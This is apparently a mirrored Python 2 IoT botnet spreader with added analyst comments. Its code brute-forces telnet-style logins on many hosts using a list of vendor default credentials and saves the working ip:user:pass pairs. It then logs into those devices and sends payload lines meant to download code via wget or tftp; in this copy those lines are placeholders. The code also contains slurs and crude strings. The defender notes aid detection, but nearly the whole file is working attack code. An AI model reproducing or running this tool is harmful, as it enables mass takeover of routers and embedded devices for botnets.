mirror of https://github.com/threatland/TL-BOTS
#!/usr/bin/env python
# -*- coding: utf-8 -*-

# Python 2 source: it uses print statements, raw_input() and the StringIO
# module, none of which exist under those names in Python 3.
import os, socket, sys, time, threading, StringIO, argparse, random

# random.choice() over a one-element list always returns that element; the
# value is only used as the tail of the start-up prompt below.
jackmeoff = random.choice(["see nudes of R00tGod"])
# Waits for a line on stdin before anything else runs (including argument
# parsing further down the file).
raw_input('Press <ENTER> to '+jackmeoff)

# Fixed block-letter banner written to stdout. Together with the handle in the
# prompt above, these are constant strings and can serve as static indicators
# when triaging a recovered copy of this script.
print "\n"
print "▀█████████▄ ███ █▄ ▄███████▄ ▄██ ▄ ▀█████████▄ ▄██████▄ ▀████ ▐████▀ "
print " ███ ███ ███ ███ ██▀ ▄██ ███ ██▄ ███ ███ ███ ███ ███▌ ████▀ "
print " ███ ███ ███ ███ ▄███▀ ███▄▄▄███ ███ ███ ███ ███ ███ ▐███ "
print " ▄███▄▄▄██▀ ███ ███ ▀█▀▄███▀▄▄ ▀▀▀▀▀▀███ ▄███▄▄▄██▀ ███ ███ ▀███▄███▀ "
print "▀▀███▀▀▀██▄ ███ ███ ▄███▀ ▀ ▄██ ███ ▀▀███▀▀▀██▄ ███ ███ ████▀██▄ "
print " ███ ██▄ ███ ███ ▄███▀ ███ ███ ███ ██▄ ███ ███ ▐███ ▀███ "
print " ███ ███ ███ ███ ███▄ ▄█ ███ ███ ███ ███ ███ ███ ▄███ ███▄ "
print "▄█████████▀ ████████▀ ▀████████▀ ▀█████▀ ▄█████████▀ ▀██████▀ ████ ███▄ "
print "\n"
# Command-line interface. The two optional flags select the mode; the dispatch
# at the end of the file tests --execute first, then --brute.
parser = argparse.ArgumentParser()
# -b/--brute: path to a file of targets, one per line. mass_check() uses the
# text before the first ':' on each line as the address.
parser.add_argument("-b","--brute",type=str, help="Brute force from list of IPs")
# -x/--execute: path to a file whose lines are split on ':' into address,
# user and password by mass_pwn().
parser.add_argument("-x","--execute",type=str, help="Execute using wget/tftp from list of IPs+user+pass")
# Positional: file to which f() appends one "ip:user:pass" line per login it
# considers successful.
parser.add_argument("output",type=str,help="Output filename")
# Positional: ceiling used by the thread-count throttles in mass_check() and
# mass_pwn().
parser.add_argument("threadcount",type=int,help="The number of threads to use")
args=parser.parse_args()

# Literal placeholder strings: this copy carries no actual download commands.
# NOTE(review): presumably these are substituted with tftp/wget command lines
# before the script is used - nothing on this page shows that step.
tpayload = "TFTPAYLOAD"
wpayload = "WGETPAYLOAD"
# Both entries joined with CRLF; loadem() splits this on "\n" and sends it one
# line at a time after logging in.
payload = tpayload+"\r\n"+wpayload+'\r\n'

# Short alias used when spawning one worker thread per target line.
Thread = threading.Thread
# Candidate user names. f() tries every entry here against every entry of
# passlist. The list also contains empty strings and values that read as
# passwords ('raspberry', 'c0nf1gur3m3', ...), and many entries repeat; it
# looks like flattened user / '' / password triples - TODO confirm upstream.
# Defender's view: the recognisable pairs (pi/raspberry, ubnt/ubnt,
# D-Link/D-Link, root/toor) are vendor or distribution defaults, so a device
# that still accepts one of them on a reachable login service is what this
# sweep finds.
userlist = ['root', '', 'toor', 'admin', 'user', 'guest', 'login', 'changeme', '1234', '12345', '123456', 'default', 'pass', 'password', '3comcso', '', 'RIP000', 'admin', '', '1234', 'admin', '', '8mb1t3M3', 'admin', '', 'admin', 'admin', '', 'c0nf1gur3m3', 'admin', '', 'cableroot', 'admin', '', 'changeme', 'admin', '', 'motorola', 'admin', '', 'password', 'admin', '', 'Password0', 'Administrator', '', 'admin', 'adminttd', '', 'adminttd', 'comcast', '', '1234', 'cusadmin', '', 'highspeed', 'D-Link', '', 'D-Link', 'debug', '', 'synnet', 'guest', '', 'guest', 'hscroot', '', 'abc123', 'manager', '', 'manager', 'monitor', '', 'monitor', 'pi', '', 'raspberry', 'PW', '', 'unkown', 'recovery', '', 'recovery', 'root', '', '1234', 'root', '', '123456', 'root', '', 'admin', 'root', '', 'password', 'root', '', 'root', 'root', '', 'toor', 'security', '', 'security', 'storwatch', '', 'specialist', 'super', '', '5777364', 'superadmin', '', 'secret', 'superman', '', '21241036', 'support', '', 'support', 'tech', '', 'tech', 'technician', '', 'T!m3W4rn3rC4bl3', 'test', '', 'test', 'ubnt', '', 'ubnt', 'UN', '', 'unknown', 'user', '', 'user', 'volition', '', 'volition', 'vt100', '', 'public', 'VTech', '', 'VTech']
# Candidate passwords; the content is a prefix of the list above, again with
# empty strings and repeated entries.
passlist = [ 'root', '', 'toor', 'admin', 'user', 'guest', 'login', 'changeme', '1234', '12345', '123456', 'default', 'pass', 'password', '3comcso', '', 'RIP000', 'admin', '', '1234', 'admin', '', '8mb1t3M3', 'admin', '', 'admin', 'admin', '', 'c0nf1gur3m3', 'admin', '', 'cableroot', 'admin', '', 'changeme', 'admin', '', 'motorola', 'admin', '', 'password', 'admin', '', 'Password0', 'Administrator', '', 'admin', 'adminttd', '', 'adminttd', 'comcast', '', '1234', 'cusadmin', '', 'highspeed', 'D-Link', '', 'D-Link', 'debug', '', 'synnet', 'guest', '', 'guest', 'hscroot', '', 'abc123', 'manager', '', 'manager', 'monitor', '', 'monitor', 'pi', '', 'raspberry', 'PW', '', 'unkown', 'recovery', '', 'recovery', 'root', '', '1234', 'root', '', '123456', 'root', '', 'admin', 'root', '', 'password', 'root', '', 'root', 'root', '', 'toor']
# Upper bound on live threads, taken from the positional "threadcount" argument.
thread_cnt = args.threadcount

# Opens the --brute target file in append+read mode ('a+' creates it if it is
# missing) and keeps the handle in a global. mass_check() has a parameter with
# the same name but receives the path and opens the file itself, so this
# handle is not read or closed anywhere in the code shown.
if args.brute: read_h = open(str(args.brute),'a+')
# Module-level string that nothing on this page reads; f() assigns its own
# local of the same name.
niggers420 = ''
def sock_read_until(tn, criteria, timeout=30):
    """Accumulate data from *tn* until *criteria* appears in it.

    Args:
        tn: connected socket-like object; only recv() is called on it.
        criteria: substring to wait for.
        timeout: wall-clock seconds after which the loop stops.

    Returns:
        Everything received so far, including the matching text.

    Raises:
        Exception: when the loop ends without a match.
    """
    shitbuffer = ''
    start_time = time.time()
    # The deadline is only evaluated between recv() calls; how long a single
    # recv() may block depends on the socket's own timeout, not on *timeout*.
    while time.time() - start_time < timeout:
        shitbuffer += tn.recv(40960)
        time.sleep(0.01)
        if criteria in shitbuffer: return shitbuffer
    raise Exception('sock_read_until \x1b[1;33m timeout \x1b[ 0m')
def iac_wont(tn, feature):
    """Send a three-byte telnet negotiation reply for option *feature* on *tn*.

    The bytes written are 0xFF 0xFB followed by the option code. In RFC 854
    0xFB is WILL (WONT is 0xFC), so despite the function name the reply on
    the wire is IAC WILL <option> - relevant when writing a network signature
    for this client.
    """
    # print 'wont',feature
    tn.send("\xff\xfb"+chr(feature))
def iac_dont(tn, feature):
    """Send IAC DONT for option *feature* on *tn*.

    The bytes written are 0xFF 0xFE (IAC, DONT in RFC 854) followed by the
    option code.
    """
    # print 'dont',feature
    tn.send("\xff\xfe"+chr(feature))
def mass_check(read_h):
    """Start one f() worker thread per line of the file at path *read_h*.

    Each line is split on ':' and only the first field is handed to f().
    Ctrl-C in the main thread kills the whole process with signal 9.
    """
    try:
        for line in open(read_h).readlines():
            ip_info = line.split(":")
            e = Thread(target=f, args=(ip_info[0],))
            e.start()
            print threading.active_count()
            # Throttle: spin without sleeping until the number of live
            # threads is no longer above thread_cnt.
            while threading.active_count() > thread_cnt:
                pass
    except KeyboardInterrupt: os.kill(os.getpid(),9)
def mass_pwn(targets_file):
    """Start one loadem() worker thread per line of *targets_file*.

    Lines are split on ':' into address, user and password. Any exception
    raised while building or starting a thread (for example a line with fewer
    than three fields) is swallowed by the bare except. Ctrl-C in the main
    thread kills the whole process with signal 9.
    """
    try:
        targets_file_h = open(targets_file).readlines()
        for line in targets_file_h:
            ip_info = line.split(":")
            try:
                e = Thread(target=loadem, args=(ip_info[0],ip_info[1],ip_info[2]))
                e.start()
            except: pass
            print '[Thread]: ',threading.active_count()
            # Throttle: spin without sleeping until the number of live
            # threads is no longer above thread_cnt.
            while threading.active_count() > thread_cnt:
                # time.sleep(0.5)
                pass
    except KeyboardInterrupt: os.kill(os.getpid(),9)
def loadem(HOST,user,password):
    """Log in to *HOST* with known credentials and send the payload lines.

    Opens a plain TCP socket to port 22, sends *user* and *password* in
    response to the prompts, sends "sh" and "shell", waits for a '#' prompt
    and then writes each line of the module-level ``payload`` to the session.

    Returns the text read up to the next '#' after the payload, the fallback
    string if that read fails, or None when any step raises (the outer bare
    except discards every error).

    Defender's view: port 22 is hard-coded, but the exchange is a plaintext
    prompt/response login, not the SSH protocol, so detections should key on
    the dialogue (credentials followed at once by "sh" / "shell" and a
    wget/tftp command line) rather than on the port alone. Blocking outbound
    tftp/http from embedded devices limits what such a payload can fetch.

    NOTE(review): indentation was lost on this page; the nesting below is
    reconstructed from the try/except/for keywords - confirm against upstream.
    """
    host = HOST
    try:
        x = ''
        tn = socket.socket()
        tn.connect((HOST,22))
        # print "Connected to "+HOST
        print tn.recv(40960)
        tn.send(user + "\n")
        time.sleep(1)
        print sock_read_until(tn,":",10)
        tn.send(password + "\n")
        print "Spraying "+HOST
        tn.send("sh\r\n\r\n")
        time.sleep(0.01)
        tn.send("shell\r\n\r\n")
        time.sleep(0.01)
        x += sock_read_until(tn,"#",10)
        # Printed as soon as a '#' is seen; the failure-keyword test only
        # runs on the next line, so this message alone does not prove the
        # login was accepted.
        print '[+] Got shell! '+HOST
        if ('rong' in x) or ('nvalid' in x) or ('ncorrect' in x) or ('again' in x) or ('denied' in x) or ('bad' in x) or ('Bad' in x) or ('failed' in x) or ('ailure' in x) or ('connection closed by' in x) or ('User not exist' in x) or ('nformation incomplete' in x): raise Exception('fucked')
        for line in payload.split("\n"):
            # print 'Sending line '+line
            tn.send(line+'\r\n')
            x = tn.recv(40960)
            # A "> " in the reply aborts the whole attempt.
            if '> ' in x: raise Exception # because fuck those.
        # print x
        try: arch = sock_read_until(tn,"#",3)
        except: arch = 'dicks'
        print arch
        return arch
    except: pass
def f(ip):
    """Try every userlist x passlist pair against *ip* and log accepted ones.

    For each pair a new TCP connection to port 22 is opened (35 s socket
    timeout). The worker answers telnet option negotiation found in the first
    15 bytes received, sends the user name, requires a prompt containing
    'ogin:' or 'sername:', sends the password, sends "sh" and "shell", waits
    for '#', and finally echoes a hex-escaped marker and waits for its decoded
    form to confirm that commands run. A confirmed pair is appended to
    ``args.output`` as "ip:user:pass".

    Always returns the same constant string.

    Defender's view: the observable pattern is many short sessions from one
    source, each with one default credential pair, followed by "sh", "shell"
    and the ``echo -e`` marker command. The marker and its hex form are
    constant strings and are usable as indicators in session captures or
    honeypot logs. Port 22 is hard-coded, yet the dialogue is a plaintext
    telnet-style login, not SSH. Replacing factory passwords and taking
    plaintext management logins off reachable interfaces removes what this
    sweep depends on.

    NOTE(review): indentation was lost on this page; the nesting below is
    reconstructed from the try/except/else keywords and the four trailing
    ``continue`` statements - confirm against upstream before relying on the
    exact break/continue targets.
    """
    ip = ip.rstrip()
    # One-byte state flags for the negotiation parser; set when the previous
    # byte was DO (253) or WILL (251) respectively.
    iac_wont_b = 0
    iac_dont_b = 0
    for user in userlist:
        for passw in passlist:
            x = ''
            try:
                tn = socket.socket()
                tn.settimeout(35)
                tn.connect((ip,22))
            except Exception as e:
                print "\x1b[1;31m[x] Failed: \x1b[0m", ip, e
                # Leaves the password loop only; the user loop goes on.
                break
            else:
                try:
                    x += tn.recv(40960)
                except Exception as e:
                    print "\x1b[1;33m[x] Timeout: \x1b[0m", ip,e
                    break
                else:
                    try:
                        # Local assignment that nothing reads.
                        niggers420=''
                        time.sleep(0.1)
                        x += tn.recv(40960)
                        sio = StringIO.StringIO(x)
                        try:
                            # Only the first 15 bytes of the banner are
                            # scanned for negotiation commands.
                            for i in sio.read(15):
                                # print str(ord(i))
                                if ord(i) == 251: # IAC WILL
                                    iac_dont_b = 1
                                elif ord(i) == 253: # IAC DO
                                    # print 'set wont b'
                                    iac_wont_b = 1
                                elif iac_wont_b == 1:
                                    # The byte after DO is taken as the option
                                    # code and answered via iac_wont().
                                    iac_wont(tn,ord(i))
                                    iac_wont_b = 0
                                elif iac_dont_b == 1:
                                    # The byte after WILL is answered via
                                    # iac_dont().
                                    iac_dont(tn,ord(i))
                                    iac_dont_b = 0
                        except: print "IAC wtf?"
                        # print 'iac done!'
                        tn.send(user + "\r\n")
                        time.sleep(0.01)
                        # Hosts showing this banner text are skipped for
                        # this pair.
                        if 'User Access Verification' in x: raise Exception('cisco dicks')
                        x += sock_read_until(tn,":")
                        if 'ogin:' not in x and 'sername:' not in x: raise Exception('no login?')
                        tn.send(passw + "\r\n\r\n")
                        x += tn.recv(409600)
                        tn.send("sh\r\n\r\n")
                        time.sleep(0.01)
                        tn.send("shell\r\n\r\n")
                        time.sleep(0.01)
                        sock_read_until(tn,"#")
                        # Command-execution probe: the hex escapes decode to
                        # the marker string awaited below.
                        tn.send("echo -e '\\x62\\x69\\x6e\\x66\\x61\\x67\\x74'\r\n\r\n")
                        time.sleep(0.01)
                        x += tn.recv(409600)
                        time.sleep(0.01)
                        try:
                            x += sock_read_until(tn,"binfagt")
                            # print x
                            # if 'Welcome to ZTE' in x: raise Exception('ZTE')
                            if 'binfagt' not in x: raise Exception('no binfagt')
                            if '#' not in x and '>' not in x and '%' not in x and '$' not in x and ':' not in x: raise Exception('no prompt')
                            # x holds the whole session transcript, so any of
                            # these fragments anywhere in it rejects the pair.
                            if ('rong' in x) or ('nvalid' in x) or ('ncorrect' in x) or ('again' in x) or ('denied' in x) or ('bad' in x) or ('Bad' in x) or ('failed' in x) or ('ailure' in x) or ('connection closed by' in x) or ('User not exist' in x) or ('nformation incomplete' in x): raise Exception('fucked')
                        except Exception as e:
                            print "[failed execution]", e,ip.rstrip()
                            continue
                        else:
                            # Accepted pair: append it to the output file.
                            file_h = open(args.output,'a+')
                            file_h.write(ip.rstrip() + ":" + user + ":" + passw+'\n')
                            file_h.close()
                            print '\x1b[1;32m[*] Execution on: \x1b[0m ', ip
                            break
                    except Exception as e:
                        # print "Timeout: ", ip, e
                        continue
                    continue
                continue
            continue
    return "my nutsack"
#p.join()
# Mode dispatch: --execute takes precedence when both flags are given; with
# neither flag the script starts no work after the banner.
if args.execute:
    mass_pwn(args.execute)
elif args.brute: mass_check(args.brute)